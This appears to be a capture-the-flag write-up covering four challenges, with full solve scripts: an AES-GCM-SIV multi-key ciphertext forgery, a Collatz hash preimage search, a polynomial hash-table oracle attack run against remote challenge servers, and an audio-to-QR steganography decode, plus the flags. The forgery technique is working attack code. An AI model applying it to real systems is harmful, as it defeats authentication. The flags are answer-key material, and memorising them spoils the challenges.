FLAG: flag{th3_4x0lo7ls_4r3_n07_wh47_th3y_s33m}

Ambystoma Mexicanum Revenge

Description

The axolotls are not what they seem, they are back now, with a revenge.

Vulnerability

In this challenge, the author patched the unintended solution, forcing us to use 4 keys instead of just 1 like in the previous challenge to encrypt

for i in range(4):
    try:
        key = binascii.unhexlify(KEYS[i])
        ct = binascii.unhexlify(CIPHERTEXTS[i % len(CIPHERTEXTS)])

This means the Server wants to use the same ciphertext ct for all 4 keys

When decrypting:

• Under key 0, block 0 → "gib m"
• Under key 1, block 1 → "e fla"
• Under key 2, block 2 → "g pli"
• Under key 3, block 3 → "s"

Decryption under all 4 keys must pass authentication (tag must be correct with POLYVAL for each key) $tag = AES_{mek_j} (S_j \oplus(nonce||0^{32}) \ and \ MSB)$ where:

• $S_j=POLYVALHj(AAD,plaintext,length block)$
• $nonce || 0^{32}=nonce || b"\x00\x00\x00\x00"$

Get 4 equations and get $S_j$

Then solve the system of equations in $GF(2^{128})$ to obtain the plaintext for every key

Solve

Choose option 1 three times to get 4 keys Choose option 2 to get key, nonce leak Then run the following script

from Crypto.Cipher import AES
from Crypto.Util.strxor import strxor
import binascii, os, sys

# --------- FILL IN YOUR DEBUG INFO ----------

KEYS=['4a3384d96c2477580b3fd572108a3011', '56cbc2e00e4310981a768126c5aa0916', 'c3c9675f70b0a1c3e197b63bae8b23af', '1a63c6625cb03c957c8ec8ce39ba57ed']
CIPHERTEXTS=[]
nonce='b0369d1ca4dc211062666850'

KEYS_HEX=KEYS
CIPHERTEXTS=[]
NONCE_HEX= nonce

# ------------------------------------------------

keys  = [binascii.unhexlify(k) for k in KEYS_HEX]
nonce = binascii.unhexlify(NONCE_HEX)

# =========== GF(2^128) for POLYVAL ==============
R = PolynomialRing(GF(2), 'x')
x = R.gen()
POLYVAL_modulus = x**128 + x**127 + x**126 + x**121 + 1
K = GF(2**128, name='a', modulus=POLYVAL_modulus)

def bytes_to_bit_array(data):
    bits = []
    for b in data:
        s = bin(b)[2:].zfill(8)
        s = s[::-1]  # little-endian within byte (according to RFC 8452)
        bits.extend(int(bit) for bit in s)
    return bits

def bytes_to_fe(b):
    return K(bytes_to_bit_array(b))

def fe_to_bytes(fe):
    bits = list(fe)
    if len(bits) < 128:
        bits += [0]*(128-len(bits))
    out = bytearray()
    for i in range(0, 128, 8):
        chunk = bits[i:i+8]
        chunk.reverse()
        s = ''.join(str(bit) for bit in chunk)
        out.append(int(s, 2))
    return bytes(out)

def u64_le(i):
    return i.to_bytes(8, "little")

def length_block(aad_len, pt_len):
    # length in bits, little-endian as per RFC 8452
    return u64_le(aad_len * 8) + u64_le(pt_len * 8)

# =========== Key derivation AES-GCM-SIV =========

def derive_keys(master_key, nonce):
    """
    RFC 8452 derive_keys (AES-128).
    Returns (msg_auth_key, msg_enc_key).
    """
    assert len(master_key) in (16, 32)
    assert len(nonce) == 12
    cipher = AES.new(master_key, AES.MODE_ECB)
    blocks = []
    for ctr in range(4):
        blk = cipher.encrypt(ctr.to_bytes(4, "little") + nonce)
        blocks.append(blk)
    msg_auth_key = blocks[0][:8] + blocks[1][:8]
    msg_enc_key  = blocks[2][:8] + blocks[3][:8]
    return msg_auth_key, msg_enc_key

def check_polyval(msg_enc_key, nonce, tag):
    """
    From tag, recover S_s (POLYVAL output) like Malosdaf:
      tag = AES_Enc(mek, (S_s xor nonce||0^32) & 0x7f in MSB)
    """
    cipher = AES.new(msg_enc_key, AES.MODE_ECB)
    s = cipher.decrypt(tag)  # S_s' = S_s xor nonce||0^32, with MSB cleared
    if s[15] & 0x80:
        return False, None
    s = strxor(s, nonce + b"\x00"*4)  # S_s
    return True, s

# ========= Prepare plaintext for K[0] ==========
# Divide into 4 blocks of 16 bytes, each block .strip() then concatenate = "gib me flag plis"

b0 = b"gib m" + b" " * 11
b1 = b"e fla" + b" " * 11
b2 = b"g pli" + b" " * 11
b3 = b"s"     + b" " * 15

need_plaintext = b0 + b1 + b2 + b3
if len(need_plaintext) % 16 != 0:
    need_plaintext += b"\x00" * (16 - len(need_plaintext) % 16)

need_blocks = len(need_plaintext) // 16      # = 4
M = 4                                        # number of keys
S = M                                        # number of sacrificial blocks = M
num_blocks = need_blocks + S                 # total plaintext blocks under each key

# ======= Derive per-message keys for 4 keys =====

msg_auth_keys = []
msg_enc_keys  = []
for k in keys:
    mak, mek = derive_keys(k, nonce)
    msg_auth_keys.append(mak)
    msg_enc_keys.append(mek)

# ======= Choose common tag for all 4 keys =======

while True:
    tag = os.urandom(16)
    ok = True
    s_list = []
    for mek in msg_enc_keys:
        ok_tag, s = check_polyval(mek, nonce, tag)
        if not ok_tag:
            ok = False
            break
        s_list.append(s)
    if ok:
        break

# ======= Generate AES-CTR keystream for each key =====

counter = bytearray(tag)
counter[15] |= 0x80
counter = bytes(counter)

keystreams = [[] for _ in range(M)]
aes_objs = [AES.new(mek, AES.MODE_ECB) for mek in msg_enc_keys]

for _ in range(num_blocks):
    for j in range(M):
        ks = aes_objs[j].encrypt(counter)
        keystreams[j].append(ks)
    ctr_int = int.from_bytes(counter, "little") + 1
    counter = ctr_int.to_bytes(16, "little")

# ======= Prepare POLYVAL parameters =========

inv = bytes_to_fe(b"\x01" + b"\x00"*13 + b"\x04\x92")  # x^-128, according to RFC 8452
w = [bytes_to_fe(mak) * inv for mak in msg_auth_keys]   # H_j = msg_auth_key_j * x^-128

LENBLOCK_fe = bytes_to_fe(length_block(0, 16 * num_blocks))   # AAD = 0, plaintext = 16*num_blocks
aad_poly = [K(0)] * M  # no AAD

polyvals_rhs = []
for j in range(M):
    s_fe = bytes_to_fe(s_list[j])     # S_s^(j)
    polyvals_rhs.append(s_fe + w[j] * LENBLOCK_fe + aad_poly[j])

# ======= Build linear system A * X = b ===========
# Variable X contains M*num_blocks plaintext blocks:
#   key 0: P_0[0..num_blocks-1]
#   key 1: P_1[...]
#   key 2: ...
#   key 3: ...

matrix_size = M * num_blocks
rows = []
rhs  = []

# 1) POLYVAL equations: 1 equation per key
for j in range(M):
    row = [K(0)] * matrix_size
    # sum_i P_{j,i} * H_j^{num_blocks+1-i}
    for i in range(num_blocks):
        row[j * num_blocks + i] = w[j] ** (num_blocks + 1 - i)
    rows.append(row)
    rhs.append(polyvals_rhs[j])

# 2) Ciphertext equality equations:
#    C_i is the same for all keys => P_0[i] + P_j[i] = KS0[i] + KSj[i]
for i in range(num_blocks):
    ks0_fe = bytes_to_fe(keystreams[0][i])
    for j in range(1, M):
        row = [K(0)] * matrix_size
        row[0 * num_blocks + i] = K(1)
        row[j * num_blocks + i] = K(1)
        rows.append(row)
        rhs.append(ks0_fe + bytes_to_fe(keystreams[j][i]))

# 3) Fix plaintext for key 0, first 4 blocks
target_positions = [
    (0, 0),  # b0 for key0, block0
    (1, 1),  # b1 for key1, block1
    (2, 2),  # b2 for key2, block2
    (3, 3),  # b3 for key3, block3
]

for blk_idx, (j, blk) in enumerate(target_positions):
    row = [K(0)] * matrix_size
    row[j * num_blocks + blk] = K(1)
    rows.append(row)
    block_bytes = need_plaintext[16 * blk_idx : 16 * (blk_idx + 1)]
    rhs.append(bytes_to_fe(block_bytes))

assert len(rows) == matrix_size == len(rhs), "System is not square!"

A = Matrix(K, rows)
b_vec = vector(K, rhs)

print("[*] Solving linear system over GF(2^128)...")
X = A.solve_right(b_vec)

# ======= Construct ciphertext for key 0 ============

P0_blocks_fe = [X[i] for i in range(num_blocks)]

ct_blocks = []
for i in range(num_blocks):
    ks0_fe = bytes_to_fe(keystreams[0][i])
    ct_blocks.append(ks0_fe + P0_blocks_fe[i])  # C_i = KS0_i + P0_i

ct_bytes = b"".join(fe_to_bytes(c) for c in ct_blocks)
ciphertext_full = ct_bytes + tag

print("[*] Ciphertext length:", len(ciphertext_full))
print("[*] Ciphertext hex (paste into option 3):")
print(binascii.hexlify(ciphertext_full).decode())

Choose option 3 to submit the obtained ciphertext Choose option 4 to get the flag

FLAG: flag{4x0l075_0nly_5p4wn_1n_lu5h_c4v35_0r_1n_7h3_d4rk}

p34kC0nj3c7ur3

Description

Pave your path to ultimate hash function!

Analysis

This is the 3n + 1 - Collatz problem in the form of a hash function

The server computes myHash = uniqueHash(message) and we are given uniqueHash(myHash)

We must find 10 values such that H(i) = myHash

Exploit Idea

First, we need to find the value of myHash

The server returns H(myHash) = 25, we can search from 1 to 10000 to find which number has 25 steps, and then we can determine myHash = 4017

Then, by simply reversing the operations x * 2 and (x-1)/3 from 1, we will trace back 10 numbers that have 4017 steps to reach 1

Solve

from pwn import *
from Crypto.Util.number import isPrime
import random
import time

# --- Configuration ---
HOST = 'remote.infoseciitr.in'
PORT = 4002
MY_HASH_TARGET = 4017 # Found from leak analysis step (uniqueHash(4017) -> 25)

# --- Helper Functions ---
def get_preimage_batch(target_steps, batch_size=8000):
    """
    Generate numbers with stopping time equal to target_steps by reversing Collatz.
    Use large batch_size to increase chances of finding prime numbers at deeper levels.
    """
    # Start reversing from number 1
    current_layer = {1}

    # Loop to go back target_steps - 1 steps
    for i in range(target_steps - 1):
        next_layer = set()
        
        # Optimization: Keep population size stable to avoid RAM overflow
        parents = list(current_layer)
        if len(parents) > batch_size:
            parents = random.sample(parents, batch_size)
            
        for x in parents:
            # Reverse Rule 1: From division by 2 => multiply by 2
            next_layer.add(x * 2)

            # Reverse Rule 2: From 3x+1 => (x-1)/3
            if (x - 1) % 3 == 0:
                prev = (x - 1) // 3
                # Forward Collatz condition: 3x+1 only applies to odd numbers
                if prev % 2 == 1 and prev > 1:
                    next_layer.add(prev)
        
        current_layer = next_layer
        if not current_layer:
            return [], []

    # Final step: Classify into Prime and Composite
    primes = []
    composites = []
    
    for x in current_layer:
        # Branch A: Multiply by 2 (Always composite since x > 1)
        composites.append(x * 2)
        
        # Branch B: (x-1)/3
        if (x - 1) % 3 == 0:
            prev = (x - 1) // 3
            if prev % 2 == 1 and prev > 1:
                if isPrime(prev):
                    primes.append(prev)
                else:
                    composites.append(prev)
                    
    return primes, composites

def solve():
    context.log_level = 'info'
    
    # 1. PRE-COMPUTE: Calculate offline beforehand to avoid timeout
    # Need to find at least 10 numbers, take 15 extra to be sure
    primes_pool = set() 
    composites_pool = set()
    
    log.info(f"Target Hash: {MY_HASH_TARGET}. Finding at least 15 Prime numbers...")
    
    attempt = 1
    # Generate loop until enough Primes are collected
    while len(primes_pool) < 15:
        log.info(f"Batch {attempt}: Generating (current primes count: {len(primes_pool)})...")
        p, c = get_preimage_batch(MY_HASH_TARGET, batch_size=8000)
        primes_pool.update(p)
        composites_pool.update(c)
        attempt += 1
        
    # Convert to list to use pop() function
    primes_pool = list(primes_pool)
    composites_pool = list(composites_pool)
    
    log.success(f"Ready! Found {len(primes_pool)} Primes and {len(composites_pool)} Composites.")

    # 2. CONNECT: Now connect to server
    conn = remote(HOST, PORT)

    # 3. VERIFY LEAK
    conn.recvuntil(b"This is my hash of hash: ")
    leak = int(conn.recvline().strip())
    log.info(f"Leak from server: {leak}")
    
    proofs_needed = 10
    
    # Based on "Well Well" error analysis from previous run, we know Flag is Prime
    target_is_prime = True
    log.info("Locked Target Type: PRIME (Based on previous analysis)")
    
    while proofs_needed > 0:
        candidate = None
        
        if target_is_prime:
            if not primes_pool:
                log.error("Ran out of Prime numbers to send! Need to increase batch_size or run again.")
                return
            candidate = primes_pool.pop()
        else:
            if not composites_pool:
                log.error("Ran out of Composite numbers!")
                return
            candidate = composites_pool.pop()

        # Send number to server
        log.info(f"Sending number (Is Prime? {isPrime(candidate)})...")
        conn.recvuntil(b"Enter your message in hex: ")
        conn.sendline(hex(candidate).encode())
        
        # Read response
        try:
            response = conn.recvline().decode().strip()
            log.info(f"Server response: {response}")
        except EOFError:
            log.error("Server closed connection unexpectedly.")
            return

        if "Incorrect!" in response:
            log.error("Incorrect hash! Logic calculation has issues.")
            return
            
        elif "Correct!" in response:
            proofs_needed -= 1
            log.success(f"Correct! {proofs_needed} remaining.")
                
        elif "Well Well" in response:
            # Backup case, if guessed wrong Prime/Composite type
            log.warning("Wrong prime property! Changing target...")
            target_is_prime = not target_is_prime

    # Get Flag
    conn.interactive()

if __name__ == "__main__":
    solve()

FLAG: flag{1r0n_m4n_f0r_c0ll4tz_3ndg4m3_0f_cryp70gr4phy_1s_p34k_r16h7_313}

The job

Your non cryptography "friend" needs your help or he might lose his job. Well you don't really care you just want the flag don't you.

Anyways connect to the instance to get the flag... after helping your friend save his job ofcourse.

Analysis

Hash table has k = 256 slots, each slot can contain multiple elements

The hash function is defined as:

def get_hash(num, coeff_arr):
    hash = 0
    mult = 1
    for i in range(len(coeff_arr)):
        hash = (hash + mult * coeff_arr[len(coeff_arr)-1-i]) % mod
        mult = (mult * num) % mod
    return hash

This calculates $H_i(x) = c_0 + c_1x_i + c_2x_i^2 + ... + c_nx_i^n \ mod \ p$, such that $H_i(x) < 256$

The challenge has 2 phases:

• Phase 1

for i in range(k):
    if len(hash_table[i]) > (n + k - 1)/k:
        fail

We need to choose polynomial coefficients such that each hash_table[i] contains no more than 4 elements

• Phase 2 Similar to phase 1, but one slot of hash_table[i] has been added with junk, we have to guess which slot number it is

Exploitation StrategyChallenge

• Phase 1

We need to choose a polynomial function such that hash_table[i] contains no more than 4 elements

One strategy is to pre-select hash_table(H(x)) = x

Then hashtable = [[x1, x2, x3, x4], [x5, x6, x7, x8], ...,[0,0,0,0]]

From 896 pairs (x, y), we will use Lagrange interpolation to get the polynomial coefficients, input them to the server to automatically pass phase 1

• Phase 2

The server will pre-select 1 slot in hash_table and add junk to it, we need to find the index

The strategy is to divide hash_table into 2 halves, the first half has 128 slots with 4 elements, the rest with 3 elements

If server returns pass -> junk is in the second half If server returns fail -> junk is in the first half

The idea repeats when we find the index range where junk is located, similar to binary search

Solve

Run the script below until you get the flag

from pwn import *
import sys

MOD = 10**9 + 7
K = 256
N = 896

# ---------- Polynomial helpers ----------

def poly_add(A, B, p):
    n = max(len(A), len(B))
    res = [0] * n
    for i in range(n):
        if i < len(A):
            res[i] = (res[i] + A[i]) % p
        if i < len(B):
            res[i] = (res[i] + B[i]) % p
    # trim highest-degree zeros
    while len(res) > 1 and res[-1] == 0:
        res.pop()
    return res

def poly_scal_mul(A, s, p):
    return [(a * s) % p for a in A]

def poly_mul_linear(A, c0, c1, p):
    """
    Return A(x) * (c0 + c1*x).
    """
    res = [0] * (len(A) + 1)
    for i, a in enumerate(A):
        res[i]     = (res[i] + a * c0) % p
        res[i + 1] = (res[i + 1] + a * c1) % p
    # trim
    while len(res) > 1 and res[-1] == 0:
        res.pop()
    return res

def poly_eval(A, x, p):
    """
    Evaluate polynomial A (low-degree first) at x using Horner.
    """
    res = 0
    for coef in reversed(A):
        res = (res * x + coef) % p
    return res

def interpolate(xs, ys, p=MOD):
    """
    Given distinct xs and arbitrary ys, return polynomial P
    (low-degree first) of degree < len(xs) such that P(xs[i]) = ys[i].
    """
    P = [0]   # current polynomial
    Q = [1]   # product (x - x_j) over previous points
    for x_i, y_i in zip(xs, ys):
        x_i %= p
        y_i %= p
        valP = poly_eval(P, x_i, p)
        valQ = poly_eval(Q, x_i, p)
        invQ = pow(valQ, p - 2, p)   # Fermat inverse
        a = (y_i - valP) * invQ % p
        P = poly_add(P, poly_scal_mul(Q, a, p), p)
        Q = poly_mul_linear(Q, (-x_i) % p, 1, p)  # Q *= (x - x_i)
    return P

def coeffs_for_server(P, mod=MOD):
    """
    Convert low-degree-first polynomial P to the coefficient
    string expected by server.get_hash (highest degree first).
    """
    arr = [c % mod for c in reversed(P)]
    # strip leading zeros if any
    i = 0
    while i < len(arr) - 1 and arr[i] == 0:
        i += 1
    arr = arr[i:]
    return ",".join(str(c) for c in arr)

# ---------- build connection and solve ----------

def main():
    io = remote("remote.infoseciitr.in", 4006)

    # ---- Stage 0: get leaked numbers ----
    io.recvuntil(b"Press Enter to start > ")
    io.sendline(b"")
    line = io.recvline().decode().strip()
    # should be: "Here are the leaked numbers : a,b,c,..."
    assert "Here are the leaked numbers" in line
    nums_str = line.split(":", 1)[1].strip()
    xs = list(map(int, nums_str.split(",")))
    assert len(xs) == N

    # ---- Stage 1: build polynomial with <=4 per bucket ----
    # simple pattern: 4 per bucket for 0..223, rest empty
    ys0 = [i // 4 for i in range(N)]  # 0..223 each repeated 4 times
    P0 = interpolate(xs, ys0, MOD)
    coeff_str0 = coeffs_for_server(P0, MOD)

    io.recvuntil(b"> ")  # "Enter the coefficients..." prompt
    io.sendline(coeff_str0.encode())

    # skip messages until the "Press Enter to continue > " prompt
    io.recvuntil(b"Press Enter to continue > ")
    io.sendline(b"")

    # ---- Stage 2: 6 trials to learn bits 0..5 of target ----
    # Precompute subsets S_t = { i | bit t of i is 1 }
    S = []
    for t in range(6):
        S_t = {i for i in range(K) if (i >> t) & 1}
        assert len(S_t) == 128
        S.append(S_t)

    bits = []  # bits[t] = 1 if target in S_t, else 0

    for t in range(6):
        # Receive "Trial X" prompt & "Enter coeffs" prompt
        io.recvuntil(b"Trial ")
        io.recvline()  # e.g. "1 : "
        io.recvuntil(b"> ")

        # Build mapping for this trial: 4 on S_t, 3 on complement
        big = [i for i in range(K) if i in S[t]]
        small = [i for i in range(K) if i not in S[t]]
        assert len(big) == 128 and len(small) == 128

        ys = [0] * N
        pos = 0
        # assign 4 values to each big bucket
        for idx in big:
            for _ in range(4):
                ys[pos] = idx
                pos += 1
        # assign 3 values to each small bucket
        for idx in small:
            for _ in range(3):
                ys[pos] = idx
                pos += 1
        assert pos == N

        P_t = interpolate(xs, ys, MOD)
        coeff_str_t = coeffs_for_server(P_t, MOD)
        io.sendline(coeff_str_t.encode())

        # Read manager's verdict
        io.recvuntil(b"Manager says the hash ")
        res = io.recvline().decode()
        # extra blank line after that
        # (string has "\n\n") – consume one extra line safely
        try:
            io.recvline(timeout=0.1)
        except:
            pass

        if "passed" in res:
            bits.append(0)  # target not in S_t
        else:
            bits.append(1)  # target in S_t

    # ---- Deduce candidate indices and guess ----
    candidates = []
    for idx in range(K):
        ok = True
        for t in range(6):
            in_set = idx in S[t]
            if bits[t] == 1 and not in_set:
                ok = False
                break
            if bits[t] == 0 and in_set:
                ok = False
                break
        if ok:
            candidates.append(idx)

    print("Bits learned:", bits, "candidates:", candidates, file=sys.stderr)

    # There will be exactly 4 candidates; pick one (e.g. at random or first)
    guess = candidates[0]
    io.recvuntil(b"Tell your friend the index : ")
    io.sendline(str(guess).encode())

    # Show whatever the server prints (hopefully the flag)
    io.interactive()

if __name__ == "__main__":
    main()

FLAG: flag{h0w_d1d_h3_b3c0m3_th3_m4n4g3r}

Steg/For

Sonic

Description

We intercepted a strange audio transmission. Our audio analysts say it's not music, not speech, and definitely not random noise. Can you figure out what it is?

Analysis

Basic file inspection

First, inspect the audio file:

$ file challenge.wav
challenge.wav: RIFF (little-endian) data, WAVE audio, Microsoft PCM, 16 bit, mono 44100 Hz

So we have:

• Mono
• 16‑bit PCM
• 44,100 Hz sample rate

Let’s look at the raw samples in Python:

import wave
import numpy as np

w = wave.open("challenge.wav", "rb")
print(w.getnchannels(), w.getsampwidth(), w.getframerate(), w.getnframes())

frames = w.readframes(w.getnframes())
samples = np.frombuffer(frames, dtype="<i2")  # 16-bit little-endian
print(np.unique(samples))

Output is essentially:

• Channels: 1
• Sample width: 2 bytes
• Sample rate: 44100
• Unique sample values: [-8000, 2700, 8000]

So the “audio” isn’t voice or music; it’s a discrete digital signal using only three levels.

---

Finding the preamble

Check where the middle value 2700 appears:

idx_2700 = np.where(samples == 2700)[0]
print(len(idx_2700), idx_2700[:20], idx_2700[-20:])

We see:

• Exactly 200 samples at value 2700.
• They occupy indices 0–199.

After that, the signal uses only -8000 and +8000.

That strongly suggests the first 200 samples are a preamble / sync sequence. We can ignore them and work with the rest:

samples2 = samples[200:]

---

Guessing the symbol length

A common trick is to use a nice round time unit like 10 ms per symbol.

At 44.1 kHz:

44100 * 0.01  # 10 ms
# 441.0

So 10 ms = 441 samples. Let’s see if the remaining data length is a multiple of 441:

block_size = 441
nblocks = len(samples2) // block_size
print(nblocks, len(samples2) - nblocks * block_size)

We get:

• nblocks = 729
• Remainder = 0

Perfect: after the preamble, the audio splits into 729 blocks of 441 samples exactly.

So each block of 441 samples is one symbol.

---

Converting symbols to bits

For each 441-sample block, we can compute its average value and use the sign to determine a bit:

• Mean > 0 → bit 1
• Mean ≤ 0 → bit 0

blocks = samples2.reshape(nblocks, block_size)
means = blocks.mean(axis=1)
bits = (means > 0).astype(int)

print(np.unique(bits, return_counts=True))

This gives:

• Bit values: [0, 1]
• Counts: e.g. 328 zeroes, 401 ones

So now we have a 729‑bit sequence.

---

Bits → 2D grid

729 factors as:

729 = 27 × 27

That’s a suspiciously nice size for a small bitmap.

Reshape into a 27×27 grid:

grid = bits.reshape(27, 27)

def show_grid(g):
    return "\n".join(
        "".join("#" if b else " " for b in row)
        for row in g
    )

print(show_grid(grid))

The output looks like a 27×27 block with a solid border and structured patterns inside the border – clearly not random.

To check whether the colors are inverted, we flip 0↔1:

inv_grid = 1 - grid
print(show_grid(inv_grid))

After inversion, we can see a quiet border and a structured pattern in the center that resembles a QR code (with finder patterns in three corners).

---

Extracting the QR core

QR codes come in specific sizes. For version v:

size = 21 + 4 × (v - 1)

Sizes:

• v1 → 21×21
• v2 → 25×25
• v3 → 29×29
• …

We have a 27×27 grid. That suggests:

• 1-pixel border around
• Inner 25×25 core → matches QR version 2

So we extract the inner 25×25 region, stripping 1 row/column from each side:

core = inv_grid[1:26, 1:26]
print(core.shape)   # (25, 25)
print(show_grid(core))

The resulting pattern has classic QR structures:

• Three large finder squares in three corners
• Timing patterns
• Data and error correction modules

So this is our QR code raster.

---

Rendering the QR as an image

Next, we render the core grid into an actual image (black / white pixels), scaled up to make scanning easy.

from PIL import Image

scale = 10  # pixels per module
N = 25      # QR core size

img = Image.new("L", (N * scale, N * scale), 255)  # start all white
pixels = img.load()

for y in range(N):
    for x in range(N):
        color = 0 if core[y, x] == 1 else 255  # 1=black, 0=white
        for dy in range(scale):
            for dx in range(scale):
                pixels[x * scale + dx, y * scale + dy] = color

img.save("qr_raw.png")

QR scanners generally expect a quiet zone (white margin) around the code, typically 4 modules wide. We add that:

quiet   = 4      # quiet zone width in modules
modsize = 10     # pixels per module
size    = (N + 2*quiet) * modsize

img2 = Image.new("L", (size, size), 255)
pix2 = img2.load()

for y in range(N):
    for x in range(N):
        color = 0 if core[y, x] == 1 else 255
        for dy in range(modsize):
            for dx in range(modsize):
                px = (x + quiet) * modsize + dx
                py = (y + quiet) * modsize + dy
                pix2[px, py] = color

img2.save("qr_with_quiet.png")

Now qr_with_quiet.png is a properly padded QR image.

Final: flag{p1x3l5_1n_4ud10_4r3_fun!}